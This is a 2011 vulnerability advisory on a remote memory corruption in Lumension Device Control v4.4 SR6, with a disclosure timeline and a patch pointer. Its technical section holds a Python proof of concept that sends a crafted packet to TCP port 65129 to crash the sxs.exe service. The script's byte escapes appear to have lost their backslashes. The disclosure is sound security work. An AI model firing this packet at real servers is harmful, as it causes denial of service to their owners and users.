Lumension Device Control (formerly Sanctuary) remote memory corruption
Summary – 24.08.2011
Name: Lumension Device Control (formerly Sanctuary) remote memory corruption
Release Date: 24 August 2011
Reference: NGS00054
Discoverer: Andy Davis <andy.davis@ngssecure.com>
Vendor: Lumension
Vendor Reference:
Systems Affected: Lumension Device Control v4.4 SR6
Risk: High
Status: Published
TimeLine
Discovered: 3 March 2011
Released: 3 March 2011
Approved: 3 March 2011
Reported: 3 March 2011
Fixed: 24 May 2011
Published: 24 August 2011
Description
By sending a specially crafted packet to TCP port 65129 the sxs.exe service running on the Lumension application server terminates
Technical Details
A simple PoC is presented here:
#!/usr/local/bin/python
import sys
from socket import *
import os
if (len(sys.argv)!=2):
print “n————————————————–“
print “Usage: %s <target IP>” % sys.argv[0]
print “————————————————–n”
exit(0)
host=sys.argv[1]
port=65129
packet1 = “xecx02x00x00” #length of remaining packet
packet1 += “xc9x00x00x00” #some kind of packet ID?
#packet1 += “x18x00x00x00”
packet1 += “x61x61x61x61” #crash occurs here
packet1 += “xc8x02x00x00xd4xf8x27xe3x51xdfxc9x48x82xc3”
packet1 += “xdbx73xbfx42xcex77xecx00x00x00x00x00x00x00x01x00”
packet1 += “x00x00x0dxd8x91x32x61xf4x43xa1xe1x8ex27x68x6dxde”
packet1 += “xbex1dx00x00x00x00x00x00x00x00x00x00x95x00x05x01”
packet1 += “x03x00x00x03x01x10x02x00x00x00x00x00x00x00”
packet1 += “x34x2ex34x2ex31x34x35x32” #client version
packet1 += “x00x00x00x00x00x00x00x00x00x00”
packet1 += “x00x00x00x00x00x00x00x00x00x00x00x00x00x00xd6x5e”
packet1 += “xe0x81xdbxd8xcbx01xe4x95x45xe1xdbxd8xcbx01x7cx99”
packet1 += “x47xbcxdbxd8xcbx01xd6xbcxb0x34xdcxd8xcbx01x02x00”
packet1 += “x00x00x9cx47x57x00xd4xf8x27xe3x51xdfxc9x48x82xc3”
packet1 += “xdbx73xbfx42xcex77xecx00x00x00x00x00x00x00x00x00”
packet1 += “x00x00x00x00x00x00x01x00x00x00”
packet1 += “xc0xa8x00x6b” #client IP address
packet1 += “xffxffxffx00” #client subnet mask
packet1 += “x61x00x63x00x65x00x72x00x2dx00x65x00x38x00”
packet1 += “x31x00x37x00x66x00x61x00x65x00x30x00x64x00x38x00” # client hostname
packet1 += “x00” * 480
packet1 += “x00x00x40xfcxbax01x00x00x00x00x00x00x00x00x00x80”
packet1 += “x85xccx23x00x00x00x80xeex36x00x93x84xdex84x02x00”
packet1 += “x00x00x00x00x00x00”
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(packet1)
print s.recv(1024)
s.close()
Fix Information
This issue is addressed in SR7, which can be downloaded by registered customers at:
https://portal.lumension.com/